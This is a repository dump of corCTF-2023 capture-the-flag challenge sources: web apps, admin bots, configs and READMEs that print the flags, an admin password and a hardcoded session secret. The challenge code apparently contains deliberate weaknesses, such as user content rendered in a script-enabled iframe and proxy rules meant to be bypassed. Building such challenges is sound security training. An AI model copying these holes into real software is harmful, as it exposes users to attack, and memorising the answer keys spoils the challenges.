20 |     height: 100%;
21 |     width: 100%;
22 | }


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bB.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bK.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bK.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bN.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bN.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bP.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bQ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bQ.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/bR.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wB.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wK.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wK.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wN.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wN.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wP.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wQ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wQ.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/chesspieces/wikipedia/wR.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/img/msfrogcursor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/img/msfrogcursor.png


--------------------------------------------------------------------------------
/corCTF-2023/misc/msfrogofwar2/chall/static/mp3/move.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/misc/msfrogofwar2/chall/static/mp3/move.mp3


--------------------------------------------------------------------------------
/corCTF-2023/misc/touch-grass/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 89
 2 | 
 3 | Author: Strellic, FizzBuzz101, 0x5a
 4 | 
 5 | Description:
 6 | 
 7 | Vitamin D deficiency and complications from a sedentary lifestyle are plaguing the CTF community.
 8 | 
 9 | To help change this, the esteemed CoR tribunal has decided that touching grass in sunlight is a vital part of this CTF experience.
10 | 
11 | Trying to trick this system will result in your team being placed on a hall of SHAME - the entire world will know that you don't touch grass!
12 | 
13 | Flag: `corctf{i_hope_you_d1dnt_have_a_gr4ss_allergy}`
14 | 


--------------------------------------------------------------------------------
/corCTF-2023/misc/touch-grass/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:18.16.1-bullseye-slim
 2 | 
 3 | WORKDIR /app
 4 | 
 5 | COPY package.json ./
 6 | 
 7 | RUN npm i
 8 | 
 9 | COPY . .
10 | 
11 | CMD ["node", "app.js"]


--------------------------------------------------------------------------------
/corCTF-2023/misc/touch-grass/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "touch-grass",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "app.js",
 6 |   "scripts": {
 7 |     "start": "node app.js"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "@google-cloud/vision": "^3.1.4",
13 |     "exif-parser": "^0.1.12",
14 |     "express": "^4.18.2",
15 |     "express-session": "^1.17.3",
16 |     "hbs": "^4.2.0",
17 |     "memorystore": "^1.6.7",
18 |     "multer": "^1.4.5-lts.1",
19 |     "sharp": "^0.32.4"
20 |   }
21 | }
22 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 4
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | 
 7 | Now that Twitter is 🦀 gone 🦀, it's time for a new social media platform.
 8 | 
 9 | 🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀🦀 
10 | 
11 | Flag: `corctf{b3tter_name_th4n_x}`


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/adminbot.js:
--------------------------------------------------------------------------------
 1 | import flag from './chall/flag.txt'
 2 | 
 3 | function sleep(time) {
 4 |   return new Promise(resolve => {
 5 |     setTimeout(resolve, time)
 6 |   })
 7 | }
 8 | 
 9 | export default {
10 |   name: 'crabspace admin bot',
11 |   urlRegex: /^https:\/\/web-crabspace-crabspace-[0-9a-f]+\.be\.ax\/space\//,
12 |   timeout: 10000,
13 |   handler: async (url, ctx) => {
14 |     const page = await ctx.newPage();
15 |     
16 |     const { origin } = new URL(url);
17 |     await page.goto(`${origin}/login`, { waitUntil: 'domcontentloaded' });
18 | 
19 |     await page.type("input[name=name]", "admin");
20 |     await page.type("input[name=pass]", flag);
21 |     await page.click("input[type=submit]");
22 | 
23 |     await page.waitForSelector('textarea', { visible: true });
24 | 
25 |     await page.goto(url, { timeout: 5000, waitUntil: 'domcontentloaded' })
26 |     await page.waitForTimeout(5000);
27 |   }
28 | }


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "crabspace"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [dependencies]
 9 | async-trait = "0.1.68"
10 | axum = { version = "0.6.18", features = ["query"] }
11 | axum-sessions = "0.5.0"
12 | clokwerk = "0.4.0"
13 | dashmap = "5.4.0"
14 | once_cell = "1.17.1"
15 | rand = "0.8.5"
16 | serde = { version = "1.0.163", features = ["derive"] }
17 | serde_json = "1.0.96"
18 | tera = "1.18.1"
19 | tokio = { version = "1.28.1", features = ["full"] }
20 | tower-http = { version = "0.4.0", features = ["fs"] }
21 | uuid = { version = "1.3.2", features = ["v4", "serde"] }
22 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | # build phase
 2 | FROM rust:slim AS builder
 3 | 
 4 | WORKDIR /app
 5 | COPY . .
 6 | RUN cargo build --release
 7 | 
 8 | # final image
 9 | FROM debian:bullseye-slim
10 | 
11 | COPY flag.txt /flag.txt
12 | 
13 | WORKDIR /app
14 | COPY --from=builder /app/target/release/crabspace ./
15 | COPY --from=builder /app/public ./public
16 | COPY --from=builder /app/templates ./templates
17 | 
18 | RUN useradd -ms /bin/bash user
19 | USER user
20 | 
21 | ENV SECRET bhtfvrbya2el1aj9j9yc1khanujw5sy2cnsfnixv7pe9b0ayuyki6o3ckvzzpe6m
22 | 
23 | CMD ["/app/crabspace"]


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/flag.txt:
--------------------------------------------------------------------------------
1 | corctf{b3tter_name_th4n_x}


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/public/styles.css:
--------------------------------------------------------------------------------
 1 | textarea {
 2 |     width: 100%;
 3 | }
 4 | .error {
 5 |     background-color: #f8d4d5;
 6 |     color: #83191c;
 7 |     border: #f4bfc0;
 8 |     padding: 1rem 1rem;
 9 |     margin-bottom: 1rem;
10 |     border-radius: 0.375rem;
11 | }
12 | .info {
13 |     background-color: #d6defa;
14 |     color: #1f358a;
15 |     border: #c2cdf8;
16 |     padding: 1rem 1rem;
17 |     margin-bottom: 1rem;
18 |     border-radius: 0.375rem;
19 | }
20 | .space {
21 |     border: 0;
22 |     width: 100%;
23 |     height: 50vh;
24 | }


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/src/routes.rs:
--------------------------------------------------------------------------------
1 | pub mod admin;
2 | pub mod api;
3 | pub mod root;
4 | pub mod space;
5 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/src/routes/root.rs:
--------------------------------------------------------------------------------
 1 | use crate::utils;
 2 | use crate::utils::Context;
 3 | use axum::{response::Html, routing::get, Extension, Router};
 4 | use tera::Tera;
 5 | 
 6 | async fn login(Extension(tera): Extension<Tera>, ctx: Context) -> Html<String> {
 7 |     utils::render(tera, "login.html", ctx.tera)
 8 | }
 9 | 
10 | async fn register(Extension(tera): Extension<Tera>, ctx: Context) -> Html<String> {
11 |     utils::render(tera, "register.html", ctx.tera)
12 | }
13 | 
14 | async fn index(Extension(tera): Extension<Tera>, ctx: Context) -> Html<String> {
15 |     match ctx.user {
16 |         Some(_) => utils::render(tera, "home.html", ctx.tera),
17 |         None => utils::render(tera, "index.html", ctx.tera),
18 |     }
19 | }
20 | 
21 | pub fn router() -> Router {
22 |     Router::new()
23 |         .route("/login", get(login))
24 |         .route("/register", get(register))
25 |         .route("/", get(index))
26 | }
27 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/templates/home.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | {% block title %}🦀 crabspace 🦀 - home{% endblock title %}
 3 | {% block content %}
 4 | <h5>Hello, {{ user.name }}!</h5>
 5 | <a href="/space/{{ user.id }}">➡️ See your space</a>
 6 | <p>You have {{ user.followers | length }} followers.</p>
 7 | <h6>Change your space:</h6>
 8 | <form method="POST" action="/api/space">
 9 |     <fieldset>
10 |         <p>
11 |             <textarea rows=12 name="space">{{ user.space }}</textarea>
12 |         </p>
13 |         <p>
14 |             <input type="submit" value="Save" />
15 |         </p>
16 |     </fieldset>
17 | </form>
18 | {% endblock content %}
19 | {% block footer %}{% endblock title %}


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/templates/index.html:
--------------------------------------------------------------------------------
1 | {% extends "layout.html" %}
2 | {% block title %}🦀 crabspace 🦀{% endblock title %}
3 | {% block content %}
4 | <a href="/login">Login</a>
5 | <br />
6 | <a href="/register">Register</a>
7 | {% endblock content %}
8 | {% block footer %}{% endblock title %}


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/templates/layout.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 |   <head>
 4 |     <meta charset="UTF-8" />
 5 |     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
 6 |     <link rel="stylesheet" href="/public/axist.min.css" />
 7 |     <link rel="stylesheet" href="/public/styles.css" />
 8 |     <title>{% block title %}{% endblock title %}</title>
 9 |   </head>
10 |   <body>
11 |     <main role="main">
12 |       <div class="header">
13 |         <h2>🦀 crabspace 🦀</h2>
14 |         <p>sick of all the boring social networks? try something 🦀</p>
15 |       </div>
16 |       <hr />
17 |       <section>
18 |         {% if error %}
19 |           <div class="error">{{ error }}</div>
20 |         {% endif %}
21 |         {% if info %}
22 |           <div class="info">{{ info }}</div>
23 |         {% endif %}
24 |         {% block content %}{% endblock content %}
25 |       </section>
26 |       {% block footer %}
27 |         <hr />
28 |         <section>
29 |           <a href="/">← Back</a>
30 |         </section>
31 |       {% endblock footer %}
32 |     </main>
33 |   </body>
34 | </html>
35 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/templates/login.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | {% block title %}🦀 crabspace 🦀 - login{% endblock title %}
 3 | {% block content %}
 4 | <h4 class="title">Login</h4>
 5 | <form method="POST" action="/api/login">
 6 |     <fieldset>
 7 |         <p>
 8 |             <label for="name">Username</label>
 9 |             <input type="text" name="name" id="name" placeholder="Username" minlength="5" />
10 |         </p>
11 |         <p>
12 |             <label for="pass">Password</label>
13 |             <input type="password" name="pass" id="pass" placeholder="Password" minlength="7" />
14 |         </p>
15 |         <p>
16 |             <input type="submit" value="Login" />
17 |         </p>
18 |     </fieldset>
19 | </form>
20 | {% endblock content %}


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/templates/register.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | {% block title %}🦀 crabspace 🦀 - register{% endblock title %}
 3 | {% block content %}
 4 | <h4 class="title">Register</h4>
 5 | <form method="POST" action="/api/register">
 6 |     <fieldset>
 7 |         <p>
 8 |             <label for="name">Username</label>
 9 |             <input type="text" name="name" id="name" placeholder="Username" minlength="5" />
10 |         </p>
11 |         <p>
12 |             <label for="pass">Password</label>
13 |             <input type="password" name="pass" id="pass" placeholder="Password" minlength="7" />
14 |         </p>
15 |         <p>
16 |             <input type="submit" value="Register" />
17 |         </p>
18 |     </fieldset>
19 | </form>
20 | {% endblock content %}


--------------------------------------------------------------------------------
/corCTF-2023/web/crabspace/chall/templates/space.html:
--------------------------------------------------------------------------------
 1 | {% extends "layout.html" %}
 2 | {% block title %}🦀 crabspace 🦀{% endblock title %}
 3 | {% block content %}
 4 | <iframe sandbox="allow-scripts" srcdoc="<link rel='stylesheet' href='/public/axist.min.css' />{{ space }}" class="space"></iframe>
 5 | {% if user and id != user.id %}
 6 | <form method="POST" action="/api/follow">
 7 |     <input type="hidden" name="id" value="{{ id }}">
 8 |     <input type="submit" value="{% if user.following is containing(id) %}Unfollow{% else %}Follow{% endif %}" />
 9 | </form>
10 | {% endif %}
11 | {% if user and user.name == "admin" %}
12 | <a href="/admin/{{ id }}">Admin Panel</a>
13 | {% endif %}
14 | {% endblock content %}


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 3
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | 
 7 | Yet another note taking application...
 8 | 
 9 | HINT: the flag format for this chall is `corctf{[a-z]+}`
10 | 
11 | Flag: `corctf{leakrgod}`
12 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/admin_password.txt:
--------------------------------------------------------------------------------
1 | uJQiRIWG4s1ae5feEzPm3yLJjTCvZ5VY


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/adminbot.js:
--------------------------------------------------------------------------------
 1 | import adminPassword from './admin_password.txt'
 2 | 
 3 | function sleep(time) {
 4 |   return new Promise(resolve => {
 5 |     setTimeout(resolve, time)
 6 |   })
 7 | }
 8 | 
 9 | export default {
10 |   name: 'leakynote admin bot',
11 |   timeout: 70000,
12 |   handler: async (url, ctx) => {
13 |     const page = await ctx.newPage();
14 |     await page.goto("https://leakynote.be.ax/login.php", { waitUntil: 'domcontentloaded' });
15 |     await sleep(2000);
16 | 
17 |     await page.type("input[name=name]", "admin");
18 |     await page.type("input[name=pass]", adminPassword);
19 |     await page.click("input[type=submit]");
20 |     await sleep(2000);
21 | 
22 |     await page.goto(url, { waitUntil: 'domcontentloaded' });
23 |     await sleep(65000);
24 |   }
25 | }


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM alpine:latest
 2 | 
 3 | RUN adduser -D -u 1000 -g 1000 -s /bin/sh www
 4 | 
 5 | RUN apk add --no-cache --update php81-fpm php81-pdo php81-pdo_sqlite php81-session supervisor nginx
 6 | 
 7 | COPY config/fpm.conf /etc/php81/php-fpm.d/www.conf
 8 | COPY config/supervisord.conf /etc/supervisord.conf
 9 | COPY config/nginx.conf /etc/nginx/nginx.conf
10 | COPY config/php.ini /etc/php81/php.ini
11 | 
12 | COPY challenge /www
13 | 
14 | RUN chown -R www:www /var/lib/nginx
15 | 
16 | EXPOSE 80
17 | 
18 | CMD /usr/bin/supervisord -c /etc/supervisord.conf


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/chall/challenge/db.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     $db = new PDO('sqlite:/tmp/leakynote.db');
 3 |     $db->exec("CREATE TABLE IF NOT EXISTS users (username TEXT, password TEXT);");
 4 |     $db->exec("CREATE TABLE IF NOT EXISTS posts (username TEXT, id TEXT, title TEXT, contents TEXT);");
 5 | 
 6 |     // check for admin user
 7 |     $stmt = $db->prepare("SELECT * FROM users WHERE username=?");
 8 |     $stmt->execute(["admin"]);
 9 |     $user = $stmt->fetch();
10 | 
11 |     if (!$user) {
12 |         // initialize admin user
13 |         $admin_password = getenv("ADMIN_PASSWORD") ?: "admin_password";
14 |         $hash = password_hash($admin_password, PASSWORD_BCRYPT);
15 |         $stmt = $db->prepare("INSERT INTO users (username, password) VALUES (?, ?)");
16 |         $stmt->execute(["admin", $hash]);
17 |         // initialize flag post
18 |         $stmt = $db->prepare("INSERT INTO posts (username, id, title, contents) VALUES (?, ?, ?, ?)");
19 |         $stmt->execute(["admin", bin2hex(random_bytes(8)), "flag", getenv("FLAG") ?: "corctf{test_flag}"]);
20 |     }
21 | ?>


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/chall/config/fpm.conf:
--------------------------------------------------------------------------------
 1 | [global]
 2 | daemonize = no
 3 | error_log = /dev/stderr
 4 | log_level = notice
 5 | 
 6 | [www]
 7 | user = www
 8 | group = www
 9 | 
10 | clear_env = Off
11 | 
12 | listen = /run/php-fpm.sock
13 | listen.owner = www
14 | listen.group = www
15 | 
16 | pm = dynamic
17 | pm.max_children = 5
18 | pm.start_servers = 2
19 | pm.min_spare_servers = 1
20 | pm.max_spare_servers = 3


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/chall/config/nginx.conf:
--------------------------------------------------------------------------------
 1 | user www;
 2 | pid /run/nginx.pid;
 3 | error_log /dev/stderr info;
 4 | 
 5 | events {
 6 |     worker_connections 1024;
 7 | }
 8 | 
 9 | http {
10 |     server_tokens off;
11 |     charset utf-8;
12 |     keepalive_timeout 20s;
13 |     sendfile on;
14 |     tcp_nopush on;
15 |     client_max_body_size 1M;
16 | 
17 |     include /etc/nginx/mime.types;
18 | 
19 |     server {
20 |         listen 80;
21 |         server_name _;
22 | 
23 |         index index.php;
24 |         root /www;
25 | 
26 |         location / {
27 |             try_files $uri $uri/ /index.php?$query_string;
28 |             add_header Content-Security-Policy "script-src 'none'; object-src 'none'; frame-ancestors 'none';";
29 |             location ~ \.php$ {
30 |                 try_files $uri =404;
31 |                 fastcgi_pass unix:/run/php-fpm.sock;
32 |                 fastcgi_index index.php;
33 |                 fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
34 |                 include fastcgi_params;
35 |             }
36 |         }
37 |     }
38 | }


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/chall/config/php.ini:
--------------------------------------------------------------------------------
1 | extension=pdo_sqlite
2 | extension=sqlite3
3 | [sqlite3]
4 | ; https://php.net/sqlite3.extension-dir
5 | ;sqlite3.extension_dir =
6 | ; the sqlite_dbpage virtual table.
7 | ; https://www.sqlite.org/c3ref/c_dbconfig_defensive.html
8 | ;sqlite3.defensive = 1


--------------------------------------------------------------------------------
/corCTF-2023/web/leakynote/chall/config/supervisord.conf:
--------------------------------------------------------------------------------
 1 | [supervisord]
 2 | user=root
 3 | nodaemon=true
 4 | logfile=/dev/null
 5 | logfile_maxbytes=0
 6 | pidfile=/run/supervisord.pid
 7 | 
 8 | [program:fpm]
 9 | command=php-fpm81 -F
10 | autostart=true
11 | priority=1000
12 | stdout_logfile=/dev/stdout
13 | stdout_logfile_maxbytes=0
14 | stderr_logfile=/dev/stderr
15 | stderr_logfile_maxbytes=0
16 | 
17 | [program:nginx]
18 | command=nginx -g 'daemon off;'
19 | autostart=true
20 | stdout_logfile=/dev/stdout
21 | stdout_logfile_maxbytes=0
22 | stderr_logfile=/dev/stderr
23 | stderr_logfile_maxbytes=0


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/README.md:
--------------------------------------------------------------------------------
 1 | Solves: 2
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | 
 7 | A helpful tool for converting your sites to PDFs.
 8 | 
 9 | NOTE: There are known issues with connecting to this challenge. Please wait for the instance to be "running" before viewing the URL. If your instance is up but it says 404, try on a different browser or incognito. 
10 | 
11 | ---
12 | 
13 | 24 hr hint drop: the first step is to find a gunicorn and nginx parser differential... i may have installed nginx from a package manager, but that doesn't mean its up to date 🙃
14 | 
15 | Flag: `corctf{y0u_are_a_pdf_pr0digy!!!}`


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/app/pages/generate.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |     <head>
 4 |         <meta charset="utf-8">
 5 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 6 |         <title>pdf-pal</title>
 7 |         <link rel="stylesheet" href="https://unpkg.com/axist@latest/dist/axist.min.css" />
 8 |     </head>
 9 |     <body>
10 |         <section>
11 |             <h2>pdf-pal</h2>
12 |             <p>pdf-pal is a helpful tool to store your PDFs and generate them from links!</p>
13 |             <a href="/home">Home</a>
14 |         </section>
15 |         <hr />
16 |         <section>
17 |             <h5>Generate from URL:</h5>
18 |             <form method="POST" action="/generate">
19 |                 <input type="url" name="url" placeholder="http(s)://" style="width: 100%" />
20 |                 <input type="submit" style="margin-top: 1rem" />
21 |             </form>
22 |         </section>
23 |     </body>
24 | </html>


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/app/requirements.txt:
--------------------------------------------------------------------------------
 1 | certifi==2021.10.8
 2 | charset-normalizer==2.0.12
 3 | click==8.0.4
 4 | Flask==2.0.3
 5 | gunicorn==20.1.0
 6 | idna==3.3
 7 | itsdangerous==2.1.1
 8 | Jinja2==3.0.3
 9 | MarkupSafe==2.1.1
10 | requests==2.27.1
11 | urllib3==1.26.9
12 | Werkzeug==2.0.3
13 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/config/nginx.conf:
--------------------------------------------------------------------------------
 1 | pid /run/nginx.pid;
 2 | error_log /dev/stderr info;
 3 | 
 4 | events {
 5 |     worker_connections 1024;
 6 | }
 7 | 
 8 | http {
 9 |     server_tokens off;
10 |     log_format docker '$remote_addr $remote_user $status "$request" "$http_referer" "$http_user_agent" ';
11 |     access_log /dev/stdout docker;
12 | 
13 |     charset utf-8;
14 |     keepalive_timeout 20s;
15 |     sendfile on;
16 |     tcp_nopush on;
17 | 
18 |     include /etc/nginx/mime.types;
19 | 
20 |     proxy_request_buffering off;
21 |     proxy_http_version 1.1;
22 |     client_max_body_size 0;
23 |     client_body_buffer_size 0;
24 | 
25 |     server {
26 |         listen 80;
27 |         server_name _;
28 | 
29 |         location / {
30 |             proxy_pass http://localhost:7777;
31 | 
32 |             location ^~ /generate {
33 |                 allow 127.0.0.1;
34 |                 deny all;
35 |             }
36 | 
37 |             location ^~ /rename {
38 |                 allow 127.0.0.1;
39 |                 deny all;
40 |             }
41 |         }
42 |     }
43 | }


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/config/supervisord.conf:
--------------------------------------------------------------------------------
 1 | [supervisord]
 2 | nodaemon=true
 3 | logfile=/dev/null
 4 | logfile_maxbytes=0
 5 | pidfile=/run/supervisord.pid
 6 | user=root
 7 | 
 8 | [program:pdf]
 9 | directory=/pdf-gen
10 | command=node app.js
11 | autorestart=true
12 | stdout_logfile=/dev/stdout
13 | stdout_logfile_maxbytes=0
14 | stderr_logfile=/dev/stderr
15 | stderr_logfile_maxbytes=0
16 | 
17 | [program:app]
18 | directory=/app
19 | command=gunicorn -b 127.0.0.1:7777 app:app
20 | autorestart=true
21 | stdout_logfile=/dev/stdout
22 | stdout_logfile_maxbytes=0
23 | stderr_logfile=/dev/stderr
24 | stderr_logfile_maxbytes=0
25 | 
26 | [program:nginx]
27 | command=nginx -g 'daemon off;'
28 | autorestart=true
29 | stdout_logfile=/dev/stdout
30 | stdout_logfile_maxbytes=0
31 | stderr_logfile=/dev/stderr
32 | stderr_logfile_maxbytes=0


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/flag.txt:
--------------------------------------------------------------------------------
1 | corctf{y0u_are_a_pdf_pr0digy!!!}
2 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/pdf-gen/output/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2023/web/pdf-pal/chall/pdf-gen/output/.gitkeep


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/pdf-gen/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "pdf-gen",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "app.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "puppeteer": "^20.9.0",
13 |     "@fastify/static": "^6.9.0",
14 |     "fastify": "^4.21.0"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/corCTF-2023/web/pdf-pal/chall/pdf-gen/pdfbot.js:
--------------------------------------------------------------------------------
 1 | const puppeteer = require("puppeteer");
 2 | const crypto = require("crypto");
 3 | 
 4 | const generate = async (url) => {
 5 |     const browser = await puppeteer.launch({
 6 |         headless: true,
 7 |         args: [
 8 |             '--no-sandbox',
 9 |             '--disable-setuid-sandbox',
10 |             '--js-flags=--noexpose_wasm,--jitless' // this is a web chall :>
11 |         ],
12 |         dumpio: true,
13 |         pipe: true, // lmao no
14 |         executablePath: process.env.PUPPETEER_EXEC_PATH
15 |     });
16 | 
17 |     const page = await browser.newPage();
18 | 
19 |     await page.goto(url, { waitUntil: "networkidle0" });
20 | 
21 |     const pdf = `${crypto.randomUUID()}.pdf`;
22 | 
23 |     await page.pdf({ path: `./output/${pdf}` });
24 | 
25 |     await browser.close();
26 | 
27 |     return pdf;
28 | };
29 | 
30 | module.exports = { generate };


--------------------------------------------------------------------------------